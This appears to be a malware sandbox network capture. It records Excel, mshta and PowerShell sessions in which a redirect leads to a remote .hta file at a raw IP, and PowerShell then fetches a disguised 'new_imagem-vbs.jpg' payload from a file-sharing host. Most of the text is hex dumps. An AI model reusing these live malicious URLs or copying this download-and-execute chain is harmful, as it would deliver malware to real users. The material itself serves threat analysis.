                                                  2024-12-02 06:24:40 UTC82INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 36 2e 37 30 2e 31 31 33 2e 32 30 30 2f 32 33 31 2f 64 6e 76 2f 73 65 65 6d 65 62 65 73 74 74 68 69 6e 67 73 67 69 76 65 6e 6d 65 67 6f 6f 64 2e 68 74 61
                                                  Data Ascii: Found. Redirecting to http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.2249166188.114.96.64433392C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-02 06:24:57 UTC402OUTGET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: linkjago.me
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:24:57 UTC1208INHTTP/1.1 302 Found
                                                  Date: Mon, 02 Dec 2024 06:24:57 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 82
                                                  Connection: close
                                                  cross-origin-embedder-policy: require-corp
                                                  cross-origin-opener-policy: same-origin
                                                  cross-origin-resource-policy: same-origin
                                                  x-dns-prefetch-control: off
                                                  x-frame-options: SAMEORIGIN
                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                  x-download-options: noopen
                                                  x-content-type-options: nosniff
                                                  origin-agent-cluster: ?1
                                                  x-permitted-cross-domain-policies: none
                                                  referrer-policy: no-referrer
                                                  x-xss-protection: 0
                                                  location: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
                                                  vary: Accept, Accept-Encoding
                                                  x-do-app-origin: 4d89fdb9-9ba1-426a-ad91-7dcdf1d2a676
                                                  Cache-Control: private
                                                  x-do-orig-status: 302
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jqdXdP54fEp%2Bk7hqgmVdneCF%2BD%2BGZiC5j3gdkY58GoGGy3bnxIFbdrW5PpnK%2BQdUzRNzem1VveSuYrlxNgrnj%2BpeA5BQ6af2rrgshIvNB7m%2Bprv9EnxdP3hXj%2B0hCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8eb93ca73b5a439a-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-02 06:24:57 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 37 31 33 26 6d 69 6e 5f 72 74 74 3d 31 37 30 38 26 72 74 74 5f 76 61 72 3d 36 35 30 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 39 26 72 65 63 76 5f 62 79 74 65 73 3d 39 38 34 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 36 37 30 34 38 30 26 63 77 6e 64 3d 32 33 33 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 63 32 62 61 66 66 34 34 39 38 65 65 38 39 36 31 26 74 73 3d 37 35 36 26 78 3d 30 22 0d 0a 0d 0a
                                                  Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1708&rtt_var=650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=984&delivery_rate=1670480&cwnd=233&unsent_bytes=0&cid=c2baff4498ee8961&ts=756&x=0"
                                                  2024-12-02 06:24:57 UTC82INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 36 2e 37 30 2e 31 31 33 2e 32 30 30 2f 32 33 31 2f 64 6e 76 2f 73 65 65 6d 65 62 65 73 74 74 68 69 6e 67 73 67 69 76 65 6e 6d 65 67 6f 6f 64 2e 68 74 61
                                                  Data Ascii: Found. Redirecting to http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.2249167142.215.209.774433108C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-02 06:24:58 UTC198OUTGET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1
                                                  Host: 1016.filemail.com
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:24:59 UTC328INHTTP/1.1 200 OK
                                                  Content-Length: 2230233
                                                  Content-Type: image/jpeg
                                                  Last-Modified: Thu, 28 Nov 2024 11:44:46 GMT
                                                  Accept-Ranges: bytes
                                                  ETag: 1c84779d9886011235a5e11f64ee8efb
                                                  X-Transfer-ID: qxdlxyadbikkvgc
                                                  Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                  Date: Mon, 02 Dec 2024 06:24:58 GMT
                                                  Connection: close
                                                  2024-12-02 06:24:59 UTC3715INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                  2024-12-02 06:24:59 UTC8192INData Raw: df c4 54 d1 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83 ec b3 eb 60 6d 46 b6 66 59 18 fa 6b 9e 30 3f 67 bc 14 cd 33 4f a8 57 0c 87 81 ef f5 cf 61 0b 34 76 ad f8 41 ae 7b 60 29 e1 9e 14 9e 1b 03 44 8a 18 5e e0 cd d7 09 2a bb a5 d9 b5 27 d2 38 c7 84 88 c6 b7 ad fb 5e 55 d5 5d 48 2c 0f 5e 9c 60 26 fb 21 8a e4 53 67 8e 05 f5 18 ab 6b dd 26 69 4e a0 96 54 09 1a aa ed 53 c5 10 c0 e2 da e5 95 d9 96 33 b8 df 42 dc 0c ce 7d 3c c8 68 ee e3 93 5c 8c 0d 57 f0 ed 06 b3 42 16 48 4f de 1d bd 2a 83 75 12 78 1f 0e 2f 32 75 3f 66 5d 21 96 3d 2b ca ce 42 ee 5e 36 92 3a 83 df 8c 14 52 48 cd b0 3b 2b 86 e7 92 3f eb 8f e9 75 7a ed 38 2f 16 a1 57 aa 32 df 26 cf 4a 3c fd 70 32 bc 0e 0d 6e 8b c4 c3 b0 29 1c 7f f7 a3 77 55 cf af e9 7c 5a 49 f4 4a 16 25 68 f6 8d
                                                  Data Ascii: Ta~C!C3@8`mFfYk0?g3OWa4vA{`)D^*'8^U]H,^`&!Sgk&iNTS3B}<h\WBHO*ux/2u?f]!=+B^6:RH;+?uz8/W2&J<p2n)wU|ZIJ%h
                                                  2024-12-02 06:24:59 UTC8192INData Raw: ba 77 da d1 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9 b5 a5 d6 c3 06 88 41 24 c2 47 73 6c 0f aa 99 b2 de 37 36 f8 da 3f 21 88 46 07 7b 70 07 1d b1 0d 36 9d e2 58 b5 60 09 42 9f 52 8e 28 9e 07 ea 46 07 a9 56 b6 26 89 2b ec 78 e9 ed 92 5d 89 a2 68 66 46 97 c4 65 9b c4 8c 52 a8 89 69 86 c1 ef c7 5b 19 a3 a9 79 34 f0 86 8e 31 2b dd 6d 26 80 c0 30 00 59 20 57 b9 ca a9 de b6 18 b0 3d 3d b3 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5 5a a7 d3 24 a2 19 54 bc ad b8 10 7d 26 f3 36 46 68 51 95 26 32 2b 9a 65 45 71 c0 e9 76 a0 7f 3c f5 fa d8 47 fb
                                                  Data Ascii: wH?I?U/;I>A$Gsl76?!F{p6X`BR(FV&+x]hfFeRi[y41+m&0Y W==Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G
                                                  2024-12-02 06:24:59 UTC8192INData Raw: ef 3d 2e 97 ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e 94 ba a1 27 f8 49 6c 1c ba 57 8f 4c b2 06 50 4f 6a e7 3d 07 88 ec f1 7d 17 df e2 4f 2a 64 94 2e a1 11 4e d2 08 f4 b5 d7 16 45 57 be 63 ea 9b 73 04 e4 8a ae 2b fa e0 66 3a ee 86 c1 b3 d0 8c 17 dd 9b 63 28 16 18 5d 7b 67 a9 7d 3f d9 b5 50 ac be 2a 03 73 e9 f2 c5 f0 3a 58 ca eb 7c 13 4e da 13 af f0 2d 44 ba 88 a2 03 ef 10 cd ff 00 7b 15 8f c5 b6 85 8f 88 f6 3e c7 03 c9 26 9b ca 05 49 e0 0b bf 7c e9 62 67 88 5a 31 65 1c 10 3b 7b 66 ab 03 e4 aa 3a 2f 99 7d 72 8f a5 6d cc 19 d3 72 ae e2 09 23 8e bf 5c 0c 54 0c d1 0d d6 1b bd f7 c9 88 38 9c 39 27 6a 8e 95 9a 6f a0 91 e6 55 52 80 32 ee 00 df 35 ce 28 90 32 44 fa 80 c9 4a 69 97 75 92 a7 8f a6 04 8d 42 ba b8 60 19 4b 28 04 76 eb 83 25 ba a1
                                                  Data Ascii: =./ER;UM'IlWLPOj=}O*d.NEWcs+f:c(]{g}?P*s:X|N-D{>&I|bgZ1e;{f:/}rmr#\T89'joUR25(2DJiuB`K(v%
                                                  2024-12-02 06:24:59 UTC8192INData Raw: 8d b0 70 45 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07 f0 f6 3f 21 57 66 f8 17 81 82 fa 79 74 f2 98 a5 55 dc bd 76 90 6b f2 ca 58 36 05 9f 7a c6 fe d5 7f d8 b5 71 49 a6 78 ff 00 7a a4 3a b2 d5 95 24 5f f6 f7 eb 98 71 78 ac 61 4d a3 2b 8f c4 07 f4 c0 da 5f 0c d6 16 8c 08 f6 87 1b 95 98 8a ae dd 31 f3 f6 69 59 43 99 cf 99 7d 42 8d a3 df 83 d7 07 e1 da 77 d4 e9 5f 53 2e 9d 67 59 11 4a 9d f7 b4 57 37 ec 40 24 fd 31 99 3c 5f 4f e0 9a 78 e0 d6 c8 5b 50 88 14 a2 7a 88 eb cb 0f e1 1d 39 c0 4a 7f 08 5d 1b 34 93 ce 86 28 dc 29 00 10 5b 8b ae 7d fe 18 b6 9b c3 9f 5e 9a 9d 4a 6d 8b 4e 84 aa 96 70 3e 9c 8e 78 cb 45 a5 d7 f8 ba ae a4 c2 eb 1a 90 11 59 7c bd ca 6c fa 41 e4 8f 8e 69 3f 86 cc 9e 01 26 95 c8 89 49 67 17 27 e1 02 8e da ae 7a 60 79 ef 1d
                                                  Data Ascii: pEaU/piu4d?!WfytUvkX6zqIxz:$_qxaM+_1iYC}Bw_S.gYJW7@$1<_Ox[Pz9J]4()[}^JmNp>xEY|lAi?&Ig'z`y
                                                  2024-12-02 06:24:59 UTC8192INData Raw: 19 1a b4 68 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe 1f 63 80 74 64 91 37 2a 31 53 d8 e2 ba c6 52 9b 08 b6 3d 3d 58 cc 69 be 06 f2 de 81 04 0f cf 11 8b 46 fe 6d 93 5b 79 2d ef 81 a5 f6 71 1a 1f 1f d1 2c 8b e9 3b bf f2 b6 7b 0d 7a c2 61 91 19 f6 a1 16 c5 78 bc f2 fe 19 a9 8e 0f 12 86 66 f5 05 0c 47 d5 48 fe b8 ef 89 78 82 6a 0e c8 d7 68 61 ef d7 03 2e 17 d6 24 ad 1e 92 56 10 5d ed eb 79 bb a4 90 e9 e0 65 d4 10 c4 7a ac 62 30 4f a7 d2 45 60 1d c4 75 cb 9d 6c 5a 85 01 68 0e 87 8e 4e 06 79 95 df ed 67 9d 1a f4 e0 9f f8 30 7e 2d 3b 3e aa 75 2d 41 a0 5b 00 5d d3 dd 65 d6 45 4f b5 22 98 14 ab 3f f2 11 fd 71 7f 16 dc 75 92 b0 1b 6e 1b 00 71 63 76 06 87 8c 05 fb 94 70 84 11 c4 b2 52 92 a7 9f 4b 61 b4 33 28 f0 b8 5a 45 5a 54 5a bf 82 8c 17 8b
                                                  Data Ascii: hCaY8&ctd7*1SR==XiFm[y-q,;{zaxfGHxjha.$V]yezb0OE`ulZhNyg0~-;>u-A[]eEO"?qunqcvpRKa3(ZEZTZ
                                                  2024-12-02 06:24:59 UTC8192INData Raw: e6 20 f3 f1 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be d8 07 99 03 c5 2c 2c 68 32 b2 80 bd 79 07 90 6b ae 79 33 1c 53 b2 c8 4c 8a 1b cc de 18 ee 62 55 77 11 74 3a dd 7d 33 77 53 17 8c 3c 12 39 9b 4c bb 48 65 11 b1 05 76 8e 40 f4 f5 26 b3 cb 34 f3 12 0b 3b 5a b9 63 b8 72 59 b8 63 fa 60 13 50 90 23 40 c8 1f 64 8b b8 ef a1 43 73 0a e9 f0 c7 a0 4d 34 9a a8 24 57 68 43 cc c5 d8 90 ca 08 a2 a0 71 fe 6a cc b9 67 69 84 4b 56 51 4a dd f5 f5 16 fc b9 c3 27 88 49 1e 96 18 10 22 94 76 70 db 41 3c 80 39 e3 e1 81 ec 25 89 51 88 25 9a c5 9e 7e 3f 0e d8 34 28 cf b1 08 06 ae 8e 60 cf a4 f1 2d 44 c7 51 26 a2 17 62 80 1e eb 5e d5 55 91 1e 87 5e ae 5a 3d 6c 6a d5 43 6c 8c bc 7c 28 60 7a 38 f4 a1 98 ab 50 e0 ff 00 2c 34 2a 11 42 ec b2 78 bc f3 32 41 e2 ea
                                                  Data Ascii: IjDQH,,h2yky3SLbUwt:}3wS<9LHev@&4;ZcrYc`P#@dCsM4$WhCqjgiKVQJ'I"vpA<9%Q%~?4(`-DQ&b^U^Z=ljCl|(`z8P,4*Bx2A
                                                  2024-12-02 06:24:59 UTC8192INData Raw: 41 65 5b 52 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e d1 63 93 b6 cf 4f 7c 1a 78 8c 8e 93 07 11 b4 b6 82 30 a4 21 90 30 a0 28 f7 e9 80 6f 1b d4 79 30 ed 54 57 f3 55 94 d8 ed 5d 6e fd f3 e7 9e 35 2b a0 11 59 a2 4f 4e fd 33 e8 5e 27 a6 33 69 c1 44 11 88 a3 67 63 cd 80 aa 68 7b 77 39 f3 8f 15 7f 32 73 62 88 ed f9 60 0f 4b aa 68 b4 b2 69 e4 41 24 4e 37 15 2c 46 d3 c1 bb 1f 2c e8 f5 12 69 22 91 12 32 93 b7 57 37 61 6a f8 07 a6 2a 80 b1 f5 38 8f 8e 2e e8 fe 58 de aa 36 32 09 02 12 bb 23 1b d8 1a bd 8b c7 23 01 ad 0e bd 34 7a 59 10 ab 19 0b 31 0e 2a 88 2b 54 7b f5 e7 15 82 59 20 25 e3 62 ac c2 8d 7b 5d e5 5f 4d 22 2a 99 11 95 5b d4 a4 ad 6e cb 32 88 c2 72 ad b8 5d 2f ce bf a6 01 d2 67 5d 5c 33 4c ec fb 1d 5b fe 10 7a 64 eb e6 4d 56 aa 49 93
                                                  Data Ascii: Ae[RTU7$xUI:v9.cO|x0!0(oy0TWU]n5+YON3^'3iDgch{w92sb`KhiA$N7,F,i"2W7aj*8.X62##4zY1*+T{Y %b{]_M"*[n2r]/g]\3L[zdMVI
                                                  2024-12-02 06:24:59 UTC8192INData Raw: 40 ca a2 7a 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e 98 63 a6 90 96 21 49 0b f8 98 0e 07 d7 2a 60 63 c9 fa 60 5f c3 34 4c 35 8a e4 f0 2f 68 f7 e0 e6 d1 de aa ca 52 ef a1 f6 c5 bc 31 37 6b 34 b6 3f c4 2f fe 1c df 68 d2 e8 d1 c0 c5 8b 4e d4 c5 c5 83 db 10 13 3b 4e ea 84 2a a9 f6 eb 9e 8d c0 5b 00 0e 73 3d b4 a9 6c c1 28 9e b8 1e 76 75 0d e2 e5 b6 02 09 5a 07 e4 32 ba dd 2e c9 03 06 e5 95 8f ab b5 01 8e 6a 60 d9 e2 d4 05 fe 1f e4 32 de 21 18 06 2d e2 ed 5a 8f c6 b8 c0 46 70 cd e1 f1 a2 90 17 68 35 c7 aa ab af e7 8c 78 06 9d 5d e5 76 65 34 bb 76 b7 43 95 78 83 78 7b 12 a3 d2 c0 29 06 b9 a5 07 fa e1 7c 28 c3 19 65 76 2b 29 61 b6 81 37 7c 7f 5c 04 bc 41 25 87 5d 16 f4 8c 32 a8 2a b1 72 28 31 f7 cd 3d 64 03 69 76 92 71 bb d3 b4 30 0a 38 ef
                                                  Data Ascii: @z(4EUPc!I*`c`_4L5/hR17k4?/hN;N*[s=l(vuZ2.j`2!-ZFph5x]ve4vCxx{)|(ev+)a7|\A%]2*r(1=divq08
                                                  2024-12-02 06:24:59 UTC8192INData Raw: d2 a3 93 22 a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85 59 58 23 21 00 06 1c 8e 3d ac 8f cf 15 77 2e cc cc 6c 93 66 85 5e 05 c6 dd a4 ee 50 2d 7d fd 8e 18 6a 21 54 e0 7f 19 3b 41 20 d5 11 d7 eb 89 76 eb 91 58 0d 3c 81 82 aa 05 04 6e e9 7d 08 f8 e1 a0 96 34 68 dc 95 b0 56 e8 10 78 20 f2 3a 11 43 b7 38 87 d7 0b 02 87 99 11 88 00 b0 04 93 54 30 1d d4 4f 13 ce cc 0a 12 5c 37 01 8d ed be 0d fb fc 30 0d 2a f9 d1 48 68 81 b4 ba 8b ea 38 3f 98 17 f5 c0 48 8c 8c ca c2 98 1a 3c df c7 05 58 1a 49 3c 40 20 b5 4a 0e 4e c0 c7 aa d0 06 fb df d3 20 48 8f 13 2f 99 c2 c5 44 80 7a 97 07 8b e7 11 50 b7 c9 20 51 e9 90 7a 57 eb 80 db ca ad 1b ad d9 2c 9d 01 e4 05 20 9f ce b0 53 32 bd b2 b5 92 ec 7e 9c 56 2f 59 74 0c cc 15 41 26 fa 60 3b 29 54 12 13 20 2c d0
                                                  Data Ascii: "]_vO:$YX#!=w.lf^P-}j!T;A vX<n}4hVx :C8T0O\70*Hh8?H<XI<@ JN H/DzP QzW, S2~V/YtA&`;)T ,


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.2249170188.114.96.64431520C:\Windows\System32\mshta.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-02 06:25:00 UTC426OUTGET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1
                                                  Accept: */*
                                                  Accept-Language: fr-FR
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: linkjago.me
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:25:01 UTC1198INHTTP/1.1 302 Found
                                                  Date: Mon, 02 Dec 2024 06:25:01 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 82
                                                  Connection: close
                                                  cross-origin-embedder-policy: require-corp
                                                  cross-origin-opener-policy: same-origin
                                                  cross-origin-resource-policy: same-origin
                                                  x-dns-prefetch-control: off
                                                  x-frame-options: SAMEORIGIN
                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                  x-download-options: noopen
                                                  x-content-type-options: nosniff
                                                  origin-agent-cluster: ?1
                                                  x-permitted-cross-domain-policies: none
                                                  referrer-policy: no-referrer
                                                  x-xss-protection: 0
                                                  location: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
                                                  vary: Accept, Accept-Encoding
                                                  x-do-app-origin: 4d89fdb9-9ba1-426a-ad91-7dcdf1d2a676
                                                  Cache-Control: private
                                                  x-do-orig-status: 302
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=37bb30S5OQ9%2BkIbDOQdEGU02Nbr%2FjGmReco6pZtxZu0hgMoVch92KoSa7yNFg0wb1VQQ44dWcf95H0Q2WrOWGswCJAnNfDxZPP1dKAV5zmT4XWEPkfMhH8Ch0CGFrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8eb93cbd8c234231-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-02 06:25:01 UTC216INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 32 32 32 26 6d 69 6e 5f 72 74 74 3d 32 32 31 33 26 72 74 74 5f 76 61 72 3d 38 34 39 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 30 39 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 30 38 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 32 37 35 36 36 36 26 63 77 6e 64 3d 31 32 37 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 33 35 36 61 65 32 30 34 66 33 30 63 33 39 33 34 26 74 73 3d 38 39 37 26 78 3d 30 22 0d 0a 0d 0a
                                                  Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=2222&min_rtt=2213&rtt_var=849&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=1008&delivery_rate=1275666&cwnd=127&unsent_bytes=0&cid=356ae204f30c3934&ts=897&x=0"
                                                  2024-12-02 06:25:01 UTC82INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 36 2e 37 30 2e 31 31 33 2e 32 30 30 2f 32 33 31 2f 64 6e 76 2f 73 65 65 6d 65 62 65 73 74 74 68 69 6e 67 73 67 69 76 65 6e 6d 65 67 6f 6f 64 2e 68 74 61
                                                  Data Ascii: Found. Redirecting to http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.2249172142.215.209.774433512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-02 06:25:16 UTC198OUTGET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1
                                                  Host: 1016.filemail.com
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:25:17 UTC328INHTTP/1.1 200 OK
                                                  Content-Length: 2230233
                                                  Content-Type: image/jpeg
                                                  Last-Modified: Thu, 28 Nov 2024 11:44:46 GMT
                                                  Accept-Ranges: bytes
                                                  ETag: 1c84779d9886011235a5e11f64ee8efb
                                                  X-Transfer-ID: qxdlxyadbikkvgc
                                                  Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                  Date: Mon, 02 Dec 2024 06:25:16 GMT
                                                  Connection: close
                                                  2024-12-02 06:25:17 UTC3515INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                  2024-12-02 06:25:17 UTC8192INData Raw: 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e 7d b3 c1 69 f4 cd ad fb 40 9a 7b 12 c1 09 34 5b a0 5e b9 ec 5e 3f bc a3 23 6e 08 78 21 78 39 89 e2 de 13 2c 7a 22 ba 15 da df c4 54 d1 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83 ec b3 eb 60 6d 46 b6 66 59 18 fa 6b 9e 30 3f 67 bc 14 cd 33 4f a8 57 0c 87 81 ef f5 cf 61
                                                  Data Ascii: @.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hdX}i@{4[^^?#nx!x9,z"Ta~C!C3@8`mFfYk0?g3OWa
